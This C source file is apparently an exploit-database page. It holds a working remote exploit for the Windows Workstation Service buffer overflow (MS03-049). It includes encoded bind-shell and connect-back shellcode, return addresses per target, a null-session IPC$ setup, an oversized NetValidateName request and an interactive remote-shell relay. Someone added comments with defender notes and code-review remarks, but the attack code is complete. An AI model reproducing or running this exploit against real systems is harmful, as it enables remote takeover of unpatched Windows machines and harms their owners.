
Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049) - CVE-2003-0812

  1. /*
  2.  *  Author: snooq
  3.  *  Date: 14 November 2003  
  4.  *
  5.  *  +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++
  6.  *
  7.  *  This is just slightly better than the one I posted to
  8.  *  packetstorm....
  9.  *
  10.  *  The public version will crash 'services.exe' immediately
  11.  *  while this one crash it only when u exit from shell....
  12.  *
  13.  *  I'm still trying to figure out a way to avoid the 'crash'
  14.  *  all together... any ideas????
  15.  *
  16.  *  Let me know if you hav trouble compiling this shit...
  17.  *  I hope this could be a good e.g for u to try Win32
  18.  *  exploitation..
  19.  *
  20.  *  This code is crappy... if u know of a better way of doing
  21.  *  things... pls tell me.......
  22.  *
  23.  *  Otherwise, if you guys r keen... I'll be more than happy
  24.  *  to go thru this in details wif u all... Meanwhile..enjoy!
  25.  *
  26.  *  +++++++++++++++++++++++++++++++++++++++++++++++++
  27.  */
  28.  
  29. #pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib")
  30. #pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib")
  31. #pragma comment (linker,"/NODEFAULTLIB:libcmt.lib")
  32. #pragma comment (linker,"/NODEFAULTLIB:libcd.lib")
  33. #pragma comment (lib,"ws2_32")
  34. #pragma comment (lib,"msvcrt")
  35. #pragma comment (lib,"mpr")
  36. #pragma warning (disable:4013)
  37.  
  38. #include <winsock2.h>
  39. #include <windows.h>
  40. #include <process.h>
  41. #include <stdlib.h>
  42. #include <stdio.h>
  43. #include <lm.h>
  44.  
  45. #define NOP 0x90
  46. #define PORT    24876
  47. #define KEY 0x99999999
  48.  
  49. #define ALIGN       1   // Between 0 ~ 3
  50. #define TARGET      1
  51. #define INTERVAL    3
  52. #define TIME_OUT    20
  53. #define PORT_OFFSET_1   198
  54. #define PORT_OFFSET_2   193
  55. #define IP_OFFSET   186
  56. #define SC_OFFSET   20  // Gap for some NOPs...
  57. #define RET_SIZE    2026    // Big enuff to take EIP... ;)
  58.  
  59. #define SC_SIZE_1   sizeof(bindport)
  60. #define SC_SIZE_2   sizeof(connback)
  61.  
  62. #define BSIZE   2600
  63. #define SSIZE   128
  64.  
extern char getopt(int,char **,char*);   /* not part of the MSVC CRT; assumed to be linked from a separate getopt source.
                                            Declared as returning char and compared with EOF in main(), which only
                                            terminates the loop where char is signed. */
extern char *optarg;
static int alarm_fired=0;   /* initialised here and never written anywhere else in this file; see setalarm() */

HMODULE hMod;   /* netapi32.dll module handle, filled in by sendstr() */
FARPROC fxn;    /* NetValidateName entry point, resolved in sendstr() */
HANDLE t1, t2;  /* sending thread (t1) and alarm thread (t2): created in do_send(), killed in resetalarm() */

char buff[BSIZE];   /* the request buffer handed to NetValidateName; built in main(), read by sendstr() */
  74.  
/*
 * Per-target table: an OS label, the return address the 'jmpesp' field holds
 * for that build, and the user32.dll version it was taken from. main() picks
 * an entry with '-t' (1-based, see the 'target-1' index there) and
 * showtargets() lists them. The last entry is a non-functional placeholder
 * the author kept for debugging. 'v' is an otherwise unused instance whose
 * only role is sizeof(v) in showtargets().
 */
struct {
    char *os;
    long jmpesp;
    char *dll;
}

targets[] = {
    {
        "Window 2000 (en) SP4",
        0x77e14c29,
        "user32.dll 5.0.2195.6688"
    },
    {
        "Window 2000 (en) SP1",
        0x77e3cb4c,
        "user32.dll 5.0.2195.1600"
    },
    {
        "For debugging only",
        0x41424344,
        "dummy.dll 5.0.2195.1600"
    }
}, v;
  98.  
  99. /*
  100.  * HD Moore's shellcode..... ;)
  101.  */
  102.  
  103. char bindport[]=
  104.     "\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
  105.     "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
  106.     "\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f"
  107.     "\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65"
  108.     "\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a"
  109.     "\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10"
  110.     "\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85"
  111.     "\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0"
  112.     "\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f"
  113.     "\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17"
  114.     "\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66"
  115.     "\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8"
  116.     "\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc"
  117.     "\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18"
  118.     "\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f"
  119.     "\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5"
  120.     "\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0"
  121.     "\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66"
  122.     "\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce"
  123.     "\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81"
  124.     "\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65"
  125.     "\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5"
  126.     "\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85"
  127.     "\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4"
  128.     "\xc2\x5b\x91\x99";
  129.  
  130. char connback[]=
  131.     "\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
  132.     "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
  133.     "\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33"
  134.     "\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b"
  135.     "\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7"
  136.     "\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd"
  137.     "\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce"
  138.     "\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3"
  139.     "\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71"
  140.     "\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09"
  141.     "\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce"
  142.     "\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b"
  143.     "\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd"
  144.     "\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67"
  145.     "\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14"
  146.     "\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99"
  147.     "\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd"
  148.     "\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12"
  149.     "\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72"
  150.     "\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79"
  151.     "\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12"
  152.     "\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12"
  153.     "\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09";
  154.  
/*
 * Print a message followed by a newline on stdout and terminate the process.
 * This is the single exit path for every error in the tool; note that the
 * exit status is 0 even on failure, so a caller cannot distinguish success
 * from error by status alone.
 */
void err_exit(char *s) {
    fputs(s, stdout);
    fputc('\n', stdout);
    exit(0);
}
  159.  
  160. /*
  161.  * Ripped from TESO code and modifed by ey4s for win32
  162.  * and... lamer quoted it wholesale here..... =p
  163.  */
  164.  
/*
 * Interactive relay between the local console and the remote shell socket.
 * Each iteration waits up to one second for the socket to become readable:
 * if it does, one chunk is copied to stdout; otherwise the loop blocks on a
 * console read and sends that chunk. Because the console read blocks, socket
 * output is only drained between console reads. Any non-positive result from
 * recv/write/read/send ends the process through err_exit(); the function
 * never returns normally. read()/write() on descriptors 0/1 are the CRT's
 * POSIX-style functions from <io.h>, which is not included here (warning
 * 4013, implicit declaration, is disabled at the top of the file).
 */
void doshell(int sock) {
    int l;
    char buf[512];
    struct timeval time;
    unsigned long ul[2];   /* hand-rolled fd_set: [0] = fd_count, [1] = the socket.
                              Relies on the Winsock fd_set layout; not portable. */

    time.tv_sec=1;
    time.tv_usec=0;

    while (1) {
        ul[0]=1;
        ul[1]=sock;

        /* First argument (nfds) is ignored by Winsock. */
        l=select(0,(fd_set *)&ul,NULL,NULL,&time);
        if(l==1) {
            l=recv(sock,buf,sizeof(buf),0);
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
            l=write(1,buf,l);
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
        }
        else {
            /* Timeout or select() error: block on console input instead. */
            l=read(0,buf,sizeof(buf));
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
            l=send(sock,buf,l,0);
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
        }
    }
}
  201.  
/*
 * Patch the connect-back address ('-i') into the connback payload at
 * IP_OFFSET. inet_addr() already yields network byte order; the value is
 * stored as one native 32-bit word (hence the little-endian caveat) after
 * XOR-masking it with KEY, which appears to be the mask the payload undoes
 * on itself at run time (assumption from the shared constant; not verified
 * here). Neither the offset nor the inet_addr() result is validated.
 */
void changeip(char *ip) {
    char *ptr;
    ptr=connback+IP_OFFSET;
    /* Assume Little-Endianess.... */
    *((long *)ptr)=inet_addr(ip)^KEY;
}
  208.  
/*
 * Patch a 16-bit port into 'code' at 'offset'. The port is XOR-masked with
 * KEY like the address in changeip(), but unlike there it is written high
 * byte first (network order); only the low 16 bits of the masked value are
 * stored. No bounds checking is done on 'offset' or 'port'.
 */
void changeport(char *code, int port, int offset) {
    char *ptr;
    ptr=code+offset;
    port^=KEY;
    /* Assume Little-Endianess.... */
    *ptr++=(char)((port>>8)&0xff);
    *ptr++=(char)(port&0xff);
}
  217.  
/* Print the tool banner: a blank line, the title line, and a blank line. */
void banner() {
    puts("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n");
}
  221.  
/*
 * Print the banner and the command-line help to stdout, then exit.
 * 's' is the program name (argv[0]). Never returns.
 */
void usage(char *s) {
    static const char *const help[] = {
        "\t-r\tSize of 'return addresses'\n",
        "\t-a\tAlignment size [0~3]\n",
        "\t-p\tPort to bind shell to (in 'connecting' mode), or\n",
        "\t\tPort for shell to connect back (in 'listening' mode)\n",
        "\t-s\tShellcode offset from the return address\n",
        "\t-h\tTarget's IP\n",
        "\t-t\tTarget types. ( -H for more info )\n",
        "\t-H\tShow list of possible targets\n",
        "\t-l\tListening for shell connecting\n",
        "\t\tback to port specified by '-p' switch\n",
        "\t-i\tIP for shell to connect back\n",
        "\t-I\tTime interval between each trial ('connecting' mode only)\n",
        "\t-T\tTime out (in number of seconds)\n\n",
        "\tNotes:\n\t======\n\t'-h' is mandatory\n",
        "\t'-i' is mandatory if '-l' is specified\n\n"
    };
    size_t k;

    banner();
    printf("Usage: %s [options]\n",s);
    /* The help lines contain no conversion specifiers, so fputs() is exact. */
    for (k = 0; k < sizeof help / sizeof help[0]; k++) {
        fputs(help[k], stdout);
    }
    exit(0);
}
  242.  
/*
 * Print the banner and one line per entry of the 'targets' table
 * (1-based index, OS label, return address, DLL version), then exit.
 * Never returns.
 */
void showtargets() {
    size_t count = sizeof targets / sizeof targets[0];
    size_t k;

    banner();
    puts("Possible targets are:");
    puts("=====================");
    for (k = 0; k < count; k++) {
        printf("%d) %s --> 0x%08x (%s)\n",
               (int)(k + 1), targets[k].os, targets[k].jmpesp, targets[k].dll);
    }
    exit(0);
}
  254.  
/*
 * Thread body started by do_send(). Builds the \\host\ipc$ UNC name, opens an
 * anonymous ("null") session to it with an empty user name and password, and
 * then calls netapi32!NetValidateName with the global 'buff' (BSIZE bytes,
 * filled by main()) as the name argument. The return value is stored in 'ret'
 * but never examined.
 *
 * Defender notes: the two observable events are the null session to IPC$ and
 * an oversized NetValidateName request reaching the Workstation service
 * (MS03-049 / CVE-2003-0812, per the page title). The vendor update removes
 * the overflow; disallowing anonymous SMB sessions removes the precondition
 * this function depends on. Neither LoadLibrary() nor GetProcAddress() is
 * checked for NULL before the call through 'fxn'.
 */
void sendstr(char *host) {

    WCHAR wStr[128];
    char ipc[128], hStr[128];

    DWORD ret;
    NETRESOURCE NET;

    hMod=LoadLibrary("netapi32.dll");
    fxn=GetProcAddress(hMod,"NetValidateName");

    /* _snprintf does not guarantee NUL termination when it truncates at 127. */
    _snprintf(ipc,127,"\\\\%s\\ipc$",host);
    _snprintf(hStr,127,"\\\\%s",host);
    MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));

    /* Remaining NETRESOURCE members are left uninitialised; only these four
       are consulted by WNetAddConnection2. */
    NET.lpLocalName = NULL;
    NET.lpProvider = NULL;
    NET.dwType = RESOURCETYPE_ANY;
    NET.lpRemoteName = (char*)&ipc;

    printf("-> Setting up $IPC session...(aka 'null session')\n");
    ret=WNetAddConnection2(&NET,"","",0);   /* empty credentials: anonymous session */

    if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
    else printf("-> IPC$ session setup successfully...\n");

    printf("-> Sending exploit string...\n");

    ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);   /* result unused; the thread is killed by resetalarm() */

}
  286.  
/*
 * TIMERPROC installed by setalarm(): the timeout elapsed without a shell
 * connection, so give up and terminate the whole process via err_exit().
 * The parameters are dictated by the TIMERPROC signature and are unused.
 */
VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
    (void)hwnd;
    (void)uMsg;
    (void)idEvent;
    (void)dwTime;
    err_exit("-> I give up...dude.....");
}
  290.  
/*
 * Thread body started by do_send(): arms a window-less timer on this thread's
 * message queue that calls alrm_bell() after 'timeout' seconds, then pumps
 * messages. 'alarm_fired' is never written anywhere in this file, so the loop
 * only ends when alrm_bell() exits the process or resetalarm() terminates
 * this thread. The int 'timeout' arrives through _beginthread's void*
 * argument (see do_send()).
 */
void setalarm(int timeout) {

    MSG msg = { 0, 0, 0, 0 };
    SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);   /* milliseconds */

    while(!alarm_fired) {
        if (GetMessage(&msg, 0, 0, 0) ) {
            if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
            DispatchMessage(&msg);   /* WM_TIMER with a TIMERPROC is dispatched to alrm_bell() */
        }
    }

}
  304.  
/*
 * Cancel the timeout once a shell connection exists: forcibly terminates the
 * alarm thread (t2) and then the sending thread (t1), which is presumably
 * still blocked inside the NetValidateName call. TerminateThread() runs no
 * cleanup in the killed thread, so whatever it held is simply abandoned.
 * Either failure is fatal via err_exit().
 */
void resetalarm() {
    if (TerminateThread(t2,0)==0) {
        err_exit("-> Failed to reset alarm...");
    }
    if (TerminateThread(t1,0)==0) {
        err_exit("-> Failed to kill the 'sending' thread...");
    }
}
  313.  
/*
 * Start the request-sending thread (sendstr) and the timeout thread
 * (setalarm); both handles are kept in the globals t1/t2 for resetalarm().
 * Neither callback has the void (*)(void *) signature _beginthread expects
 * (warning 4013 is disabled at the top of the file), and 'timeout' is passed
 * by value through the void* argument.
 * NOTE(review): _beginthread reports failure as -1L rather than 0, so the
 * '== 0' checks below never detect a failed thread start — confirm against
 * the CRT documentation.
 */
void do_send(char *host,int timeout) {
    t1=(HANDLE)_beginthread(sendstr,0,host);
    if (t1==0) { err_exit("-> Failed to send exploit string..."); }
    t2=(HANDLE)_beginthread(setalarm,0,timeout);
    if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
}
  320.  
/*
 * Entry point. Parses the command line, fills the global request buffer
 * 'buff' from the configured sizes and offsets, starts the sending and
 * timeout threads via do_send(), then either waits for the shell to connect
 * back ('-l') or keeps trying to reach the bind-shell port. Every failure
 * path ends in err_exit(). From a defender's view a run leaves a null
 * session to IPC$ (sendstr()), the services.exe crash the file header
 * describes, and an unexpected listener or outbound TCP connection on 'port'
 * on the target; the MS03-049 update named in the page title is the fix.
 */
int main(int argc, char *argv[]) {

    char opt;                       /* getopt() is declared as returning char; the EOF test relies on char being signed */
    char *host, *ptr, *ip="";
    struct sockaddr_in sockadd;
    int i, i_len, ok=0, mode=0, flag=0;
    int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
    int target=TARGET, scsize=SC_SIZE_1, port=PORT;
    int timeout=TIME_OUT, interval=INTERVAL;
    long retaddr;

    WSADATA wsd;
    SOCKET s1, s2;                  /* SOCKET is unsigned on Winsock: the '<0' tests below can never be true; INVALID_SOCKET is the failure value */

    if (argc<2) { usage(argv[0]); }

    /* Numeric options go through atoi() with no range validation. */
    while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
        switch(opt) {
            case 'a':
            align=atoi(optarg);
            break;

            case 'I':
            interval=atoi(optarg);
            break;

            case 'T':
            timeout=atoi(optarg);
            break;

            case 't':
            target=atoi(optarg);
            retaddr=targets[target-1].jmpesp;   /* 1-based index, not checked against the table size */
            break;

            case 'i':
            ip=optarg;
            changeip(ip);
            break;

            case 'l':
            mode=1;                 /* 'listening' mode: wait for the shell to connect back */
            scsize=SC_SIZE_2;
            break;

            case 'r':
            retsize=atoi(optarg);
            break;

            case 's':
            sc_offset=atoi(optarg);
            break;

            case 'h':
            ok=1;
            host=optarg;
            sockadd.sin_addr.s_addr=inet_addr(optarg);   /* dotted-quad only; an inet_addr() failure is not detected */
            break;

            case 'p':
            port=atoi(optarg);
            break;

            case 'H':
            showtargets();          /* exits */
            break;

            default:
            usage(argv[0]);         /* exits */
            break;
        }
    }

    /* '-h' is mandatory; '-i' is mandatory in listening mode. */
    if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }

    memset(buff,NOP,BSIZE);

    /* Copies of retaddr, four bytes at a time, starting 'align' bytes in.
       'retsize' (from '-r') is not checked against BSIZE here — the check
       further down only covers the payload placement — so an oversized '-r'
       overruns 'buff' in this process. */
    ptr=buff+align;
    for(i=0;i<retsize;i+=4) {
        *((long *)ptr)=retaddr;
        ptr+=4;
    }

    if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
        err_exit("-> WSAStartup error....");
    }

    if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        err_exit("-> socket() error...");
    }
    sockadd.sin_family=AF_INET;
    sockadd.sin_port=htons((SHORT)port);

    ptr=buff+retsize+sc_offset;

    if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");

    banner();

    if (mode) {

        printf("-> 'Listening' mode...( port: %d )\n",port);

        changeport(connback, port, PORT_OFFSET_2);
        for(i=0;i<scsize;i++) { *ptr++=connback[i]; }

        do_send(host,timeout);
        Sleep(1000);

        /* sockadd is reused as the local listening address: the target
           address set by '-h' is overwritten, and accept() later fills in
           the peer that connected. */
        sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
        i_len=sizeof(sockadd);

        if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
            err_exit("-> bind() error");
        }

        if (listen(s1,0)<0) {
            err_exit("-> listen() error");
        }

        printf("-> Waiting for connection...\n");

        s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);   /* blocks; the alarm thread ends the process on timeout */

        if (s2<0) {
            err_exit("-> accept() error");
        }

        printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));

        resetalarm();
        doshell(s2);                /* never returns */

    }
    else {

        printf("-> 'Connecting' mode...\n",port);   /* 'port' is an extra argument the format string does not consume */

        changeport(bindport, port, PORT_OFFSET_1);
        for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }

        do_send(host,timeout);
        Sleep(1000);

        printf("-> Will try connecting to shell now....\n");

        /* Retry every 'interval' seconds until connect() succeeds; only the
           alarm thread bounds this loop. */
        i=0;
        while(!flag) {
            Sleep(interval*1000);
            if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
                printf("-> Trial #%d....\n",i++);
            }
            else { flag=1; }
        }

        printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);

        resetalarm();
        doshell(s1);                /* never returns */

    }

    return 0;

}
  486.  
  487. // milw0rm.com [2003-11-14]